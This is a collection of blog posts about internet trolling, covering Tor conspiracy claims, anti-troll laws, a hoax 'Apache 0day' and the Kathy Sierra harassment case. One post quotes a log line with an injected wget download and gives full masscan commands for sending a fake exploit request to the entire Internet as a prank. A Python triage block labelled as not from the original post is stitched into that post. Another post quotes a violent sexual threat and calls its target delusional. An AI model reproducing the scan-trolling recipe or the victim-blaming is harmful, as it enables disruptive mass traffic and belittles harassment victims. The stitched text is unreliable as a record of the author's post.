Tor, also known as The Onion Router, bounces your traffic through several random Internet servers, thus hiding the source. It means you can surf a website without them knowing who you are. Your IP address may appear to be coming from Germany when in fact you live in San Francisco. When used correctly, it prevents eavesdropping by law enforcement, the NSA, and so on. It's used by people wanting to hide their actions from prying eyes, from political dissidents, to CIA operatives, to child pornographers.
Recently, Pando (an Internet infotainment site) released a story accusing Tor of being some sort of government conspiracy.
This is nonsense, of course. Pando's tell-all exposé of the conspiracy contains nothing that isn't already widely known. We in the community have long joked about this. We often pretend there is a conspiracy in order to annoy uptight Tor activists like Jacob Appelbaum, but we know there isn't any truth to it. This really annoys me -- how can I troll about Tor's government connections when Pando claims there's actually truth to the conspiracy?
The military and government throw research money around with reckless abandon. That no more means they created Tor than it means they created the Internet back in the 1970s. A lot of that research is pure research, intended to help people. Not everything the military funds is designed to kill people.
There is no single "government". We know, for example, that while some in government paid Jacob Appelbaum's salary, others investigated him for his Wikileaks connections. Different groups are often working at cross purposes -- even within a single department.
A lot of people have ties to the government, including working for the NSA. The NSA isn't some secret police designed to spy on Americans, so a lot of former NSA employees aren't people who want to bust privacy. Instead, most NSA employees are sincere in making the world a better place -- which includes preventing evil governments from spying on dissidents. As Snowden himself says, the NSA is full of honest people doing good work for good reasons. (That they've overstepped their bounds is a problem -- but that doesn't mean they are the devil).
Tor is based on open code and math. It really doesn't matter what conspiracy lies behind it, because we can see the code. It's like BitCoin -- we know there is a secret conspiracy behind it, with the secretive Satoshi Nakamoto owning a billion dollars worth of the coins. But that still doesn't shake our faith in the code and the math.
Dissidents use Tor -- successfully. We know that because the dissidents are still alive. Even if it's a secret conspiracy by the U.S. government, it still does what its supporters want, helping dissidents fight oppressive regimes. In any case, Edward Snowden, who had access to NSA secrets, trusts his own life to Tor.
Tor doesn't work by magic. I mention this because the Pando article lists lots of cases where Tor failed to protect people. The reasons were unlikely to have been flaws in Tor itself, but appear to have been other more natural causes. For example, the Silk Road server configuration proves it was open to the Internet as well as through Tor, a rookie mistake that revealed its location. The perfect concealment system can't work if you sometimes ignore it. It's like blaming the Pill for not preventing pregnancy because you took it only on some days but not others. Thus, for those of us who know technically how things work, none of the cases cited by Pando shake our trust in Tor.
I'm reasonably technical. I've read the Tor spec (though not the code). I play with things like hostile exit nodes. I fully know Tor's history and ties to the government. I find nothing in the Pando article that is credible, and much that is laughable. I suppose I'm guilty of getting trolled by this guy, but seriously, Pando pretends not to be a bunch of trolls, so maybe this deserves a response.
Thursday, November 27, 2014
Friday, August 15, 2014
Grow up, you babies
When I came home crying to my mommy because somebody at school called me "grahamcracker", my mother told me to just say "sticks and stones may break my bones but names will never hurt me". This frustrated me as a kid, because I wanted my mommy to make it stop, but of course, it's good advice. It was the only good advice back then, and it's the only solution now to stop Internet trolls.
In its quest to ban free speech, this NYTimes article can't even get the definition of the word "troll" right. Here's the correct definition:
"somebody who tries to provoke an emotional reaction"
The way to stop trolls is to grow up and stop giving them that emotional reaction. That's going to be difficult, because we have a nation of whiners and babies who don't want to grow up, who instead want the nanny-state to stop mean people from saying mean things. This leads to a police-state, where the powerful exploit anti-trolling laws to crack down on free-speech.
That NYTimes article claims that trolling leads to incivility. The opposite is true. Incivility doesn't come from me calling you a jerk. Instead, incivility comes from your inability to ignore it. It's your emotional response that is the problem, and your desire to sic the police-state on me to make me stop.
Let's work together and make our society more civil, and get people to stop responding to trolls. Let's tell the whining babies to grow the fuck up, and just repeat "sticks and stones may break my bones but names will never hurt me".
Saturday, August 02, 2014
That Apache 0day was troll
Last week, many people saw what they thought was an Apache 0day. They saw logs with lots of suggestive strings that looked like this:
[28/Jul/2014:20:04:07 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day-HIDDEN BINDSHELL-ESTAB” “-”
Somebody has come forward and taken credit for this, admitting it was a troll.
This is sort of a personality test. Many of us immediately assumed this was a troll, but that's because we are apt to disbelieve any hype. Others saw this as some new attack, but that's because they are apt to see attacks out of innocuous traffic. If your organization panicked at this "0day attack", which I'm sure some did, then you failed this personality test.
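A triage check for log lines like the one quoted above, as an added example that is not from the original post: it separates what the client chose to send (request, referer, user-agent) from what the server did (status code). The field layout is assumed from that single line, the word lists are illustrative, and NORMAL_LINE and SERVED_LINE are constructed for comparison.

```python
import re

# Access-log layout used by the line quoted in the post:
# [time] "request" status bytes "referer" "user-agent" ...
LINE_RE = re.compile(
    r'\[(?P<time>[^\]]+)\]\s+"(?P<request>[^"]*)"\s+(?P<status>\d{3})'
    r'\s+(?P<size>\d+|-)\s+"(?P<referer>[^"]*)"\s+"(?P<agent>[^"]*)"'
)
# Blog rendering turned the ASCII quotes into typographic ones; undo that.
QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2033": '"'})

# Words that alarm a human reader but mean nothing to a web server.
ALARM_WORDS = re.compile(r"0day|bindshell|chroot|ddos|stage\d", re.I)
# Syntax that matters only if a handler passes the URL to a shell.
SHELL_SYNTAX = re.compile(r";|\||`|\$\(|\b(?:wget|curl)\b", re.I)


def triage(line):
    """Classify one access-log line as 'benign', 'noise' or 'review'."""
    m = LINE_RE.search(line.translate(QUOTES))
    if m is None:
        return {"verdict": "unparsed"}
    # Everything in these three fields is chosen by the client.
    client = {k: m.group(k) for k in ("request", "referer", "agent")}
    status = int(m.group("status"))
    alarm = sorted(k for k, v in client.items() if ALARM_WORDS.search(v))
    shell = bool(SHELL_SYNTAX.search(client["request"]))
    if not alarm and not shell:
        verdict = "benign"
    elif 300 <= status < 500:
        # The server answered with a redirect or client error; the text
        # was logged, and nothing in the line shows it was acted on.
        verdict = "noise"
    else:
        # 2xx/5xx: check what the requested handler does with its input.
        verdict = "review"
    return {"verdict": verdict, "status": status,
            "alarm_fields": alarm, "shell_syntax": shell}


# The line quoted in the post (typographic quotes as rendered there).
POST_LINE = ('[28/Jul/2014:20:04:07 +0000] \u201cGET /?x0a/x04/x0a/x02/x06/x08/x09/'
             'cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0\u2033 301 178 '
             '\u201c-\u201d \u201cchroot-apach0day-HIDDEN BINDSHELL-ESTAB\u201d \u201c-\u201d')
# Constructed lines for comparison (not from the post).
NORMAL_LINE = ('[28/Jul/2014:20:04:09 +0000] "GET /index.html HTTP/1.0" '
               '200 5120 "-" "Mozilla/5.0" "-"')
SERVED_LINE = ('[28/Jul/2014:20:04:11 +0000] "GET /cgi-bin/status?h=a;wget%20'
               'example.test/x HTTP/1.0" 200 312 "-" "probe" "-"')

if __name__ == "__main__":
    for sample in (POST_LINE, NORMAL_LINE, SERVED_LINE):
        print(triage(sample))
```

The post's line comes out as "noise": the alarming words sit only in client-supplied fields and the server answered 301. The constructed 200 response is the kind of line that deserves a look at the handler.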
I don't know what tool the troll used, but I assume it was masscan, because that'd be the easiest way to do it. To do this with masscan, get a Debian/Ubuntu VPS and do the following:
apt-get install libpcap-dev dos2unix
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
echo "GET /my0dayexploit.php?a=\x0acat+/etc/password HTTP/1.0" >header.txt
echo "Referer: http://troll.com" >>header.txt
echo "" >>header.txt
unix2dos header.txt
iptables -A INPUT -p tcp --destination-port 4321 -j DROP
bin/masscan 0.0.0.0/0 -p80 --banners --hello-file header.txt --source-port 4321 --rate 1500000
Depending on the rate your VPS can transmit, you'll cover the entire Internet in one to ten hours.
The response output from servers will be printed to the screen. You probably don't want that, so you should add the "-oX troll.xml" option to save the responses to an XML file.
The above example uses "echo" to append lines of text to a file since HTTP is conveniently a text-based protocol. It uses "unix2dos" to convert the line-feeds into the cr-lf combination that HTTP wants.
Masscan has its own TCP/IP stack. Thus, on Linux, it can't establish a TCP connection, because when it tries, the existing TCP stack sees something wrong and sends a RST to kill the connection. One way to prevent this is to configure a firewall rule to tell the built-in Linux TCP/IP stack to ignore the port that masscan uses. Another way is to tell masscan to use a --source-ip that isn't assigned to any existing machine on the network.
The rates at which you can transmit vary widely by hosting provider. In theory, you should get a rate of 1.5-million packets/second, and that's easily obtained in a lab on slow machines. Yet, in real hosting environments, things slow down, and I haven't been able to figure out why. In my experience, 300,000 is more of what you'd expect to get.
Sunday, December 22, 2013
Trolling: what is it?
Over the holidays, one has to answer questions from one's family, like what is "bitcoin" or "twerking" or "trolling". In this post, I define the latter.
Trolling is like this tweet in response to a recent picture from the moon:
@SciencePorn Obviously fake. I see no stars in the background.
— Robert David Graham (@ErrataRob) December 20, 2013
I am, of course, echoing the fringe who argue that the original moon landings were fake because there were no stars in the photographs.
I got a lot of responses calling me an idiot, but zero tweets with the correct explanation. The reason you can't see stars is exposure time: if you leave the shutter open long enough for stars to show up, then the foreground moonscape will be completely washed out. Presumably, if the Chinese had taken an iPhone into space with the HDR settings, which takes two photos with different exposure lengths, one might be able to get both a good bright foreground and dim background stars in the same photograph. But sadly, the Chinese didn't have iPhones to send to the moon.
The payoff to trolling is responses like this one that gets the reason completely wrong:
@ErrataRob @SciencePorn hope you're being ironic. You can't see stars in the moon due to light reflected by the Earth
— Gabriel García (@yovivoenmordor) December 20, 2013
As I explained trolling, my mother asked me "Shouldn't you be worried that potential customers may see this, and not do business with you, thinking you are stupid?". Well, the short answer is no, because any customer who would is a customer I wouldn't want anyway.
But what my mother really asked is "aren't you afraid of looking stupid?". And the answer to that question should always be "no". Raise your hand in class and ask your question. Dance like nobody's watching. Stop caring so much what people think. Success and happiness only come from being willing to look stupid. A good way to practice this is by actually being stupid. You have to get used to the naysayers. Even at your most brilliant, when you are changing the world, there will always be someone claiming you are an idiot, and that everyone knows what you are doing is stupid and wrong.
And so that is trolling.
Saturday, March 31, 2007
Please stop feeding the trolls
When I was in grade school, I came home crying because another kid called me a bad name on the playground. My mom taught me that words can only hurt me if I let them. She taught me that the best response was to ignore the bullies.
What she taught me applies to the recent cyber-bullying against Java blogger Kathy Sierra. The crux of this story is that one or more people posted nasty and anonymous comments about her. The following is an example of one of those postings:
fuck off you boring slut... i hope someone slits your throat and cums down your gob
This, and the other posts, were pretty nasty, but it really is a person's choice to pay attention to such words. Kathy has chosen to take the posts seriously. Indeed, she has become a bit delusional about them. She claimed that the comments were "threats", even though they don't quite meet the definition of the word. In her delusional paranoia, she has claimed that other well-respected bloggers were part of the conspiracy to threaten her (because nasty comments appeared not only on her blog, but on forums attached to other blogs as well). She implied that those other bloggers were responsible for the anonymous comments that appeared on their sites -- that they encouraged harassment of Kathy. She has sullied the name of well-respected bloggers who now struggle to defend their reputation.
Such bullying is part of the larger problem of "forum trolls". Trolls are comments designed to provoke a reaction. They could be nasty personal comments, or political claims, or religious statements, or anything else that will provoke people to give the trollers attention. As my mommy taught me when dealing with bullies on the playground, the proper response to forum trolls is to ignore them. Getting upset over what they post is a choice you make. Responding to their posts only encourages them to post more of the same.
Unfortunately, many throughout the blogosphere have leapt to support Kathy. They have been competing amongst themselves to see who can be the most righteous in their outrage over the vileness of the trolls. The main effect of all these posts is, of course, to encourage forum trolls in general, and more bullying of Kathy Sierra in particular.
The other effect is to encourage the government to step in and do something. In much the same way that I wanted my mommy to fight the bullies for me, people today want the government to fight back against the forum trolls. This is a very bad thing. We already have the tools to deal with bullies. We can just ignore them. We can turn off anonymous posts from our forums. We can turn on keyword filters for offensive words. We can moderate posts, or use a community-moderation system like Slashdot. Lots of forums are essentially "troll-free" because anti-troll efforts work. Government intervention comes at a high cost, removing our freedoms, such as speech and anonymity. People like Kathy Sierra should at least try to use the tools available to her before becoming a cry baby asking for the government to do something about it.
The bloggers who support Kathy have frequently made the point that the forum trolls are cowards hiding behind anonymity. I would suggest that it's the bloggers themselves who are cowards. It doesn't take much courage to post something everyone agrees with. The situation is like a lynch mob. Nobody likes the forum trolls, and therefore nobody is going to stand up for their rights. It doesn't take courage to go along with the mob and lynch them. It takes no courage to express your righteous anger against them. What would take courage is to oppose the mob and suggest that no matter how vile those posts were, that we still need to abide by solid principles, namely that we deal with immature trolls as mature adults, and that we don't discard our rights to free speech and Internet anonymity just because we don't like what they said. It's mob rule, for example, that is responsible for eroding our rights after 9/11 with the so-called "Patriot" Act, because no politician was brave enough to stand up to the mob.
Many have used this incident to promote the idea that the computer geek community is "misogynistic" (hates women). The opposite is true. Forum trolls don't use such language because it's what THEY think, but use it because it's what WE are offended by. Indeed, it's precisely the soft-misogynism of Kathy's supporters that's at fault here. They will leap to a woman's defense more readily than a man's. Insults and threats are treated more seriously when a woman is involved. I can call a man a "dick" in nearly polite conversation, but the equivalent insult for a female is so offensive that I can't say it here. The words are more insulting because we are treating women differently, not because the trollers are. While it is appropriate to escort a woman to a car at night (there is a physical disparity), it's inappropriate to act as if a woman is less capable of defending themselves on the Internet than a man.
See also: Penny Arcade